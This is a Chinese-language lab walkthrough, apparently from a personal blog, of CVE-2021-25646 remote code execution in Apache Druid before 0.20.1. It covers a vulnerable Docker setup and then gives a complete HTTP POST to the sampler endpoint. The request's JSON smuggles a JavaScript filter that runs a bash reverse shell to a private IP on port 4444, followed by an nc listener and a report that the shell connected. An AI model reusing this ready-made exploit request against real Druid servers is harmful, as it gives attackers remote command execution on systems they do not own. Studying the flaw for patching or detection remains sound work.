一如既往的國際慣例~~~~

漏洞概述

Apache Druid 是用Java編寫的面向列的開源分布式數(shù)據(jù)存儲，旨在快速獲取大量事件數(shù)據(jù)，并在數(shù)據(jù)之上提供低延遲查詢。

Apache Druid 包括執(zhí)行用戶提供的JavaScript的功能嵌入在各種類型請求中的代碼。此功能在用于高信任度環(huán)境中，默認(rèn)已被禁用。但是，在 Druid 0.20.0 及更低版本中，經(jīng)過身份驗(yàn)證的用戶可以構(gòu)造傳入的json串來控制一些敏感的參數(shù)發(fā)送惡意請求，利用 Apache Druid 漏洞可以執(zhí)行任意代碼。

時間軸

2021-01-17

阿里云安全向Apache官方報告了Apache Druid遠(yuǎn)程代碼執(zhí)行漏洞

2021-01-29

Apache Druid官方發(fā)布了漏洞補(bǔ)丁，分配CVE編號為CVE-2021-25646。

影響版本

Apache Druid < 0.20.1

環(huán)境搭建

我們拉取鏡像并啟動Apache Druid:0.16.0版本的漏洞環(huán)境

docker pull fokkodriesprong/docker-druid

docker?run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

訪問http://your-ip:8888即可進(jìn)入靶場環(huán)境

填入

Base directory:????quickstart/tutorial/

File filter:????wikiticker-2015-09-12-sampled.json.gz

隨便填，然后點(diǎn)擊Add開啟burp代理抓包

修改內(nèi)容為

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1

Host: 192.168.91.150:8888

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json;charset=utf-8

Content-Length: 508

Origin: http://192.168.91.150:8888

Connection: close

Referer: http://192.168.91.150:8888/unified-console.html

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.2.135/4444 0>&1')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}

同時nc -nlvp開啟監(jiān)聽

反彈連接成功??！

總結(jié)

要狠狠惡補(bǔ)一下PHP了????(o-o)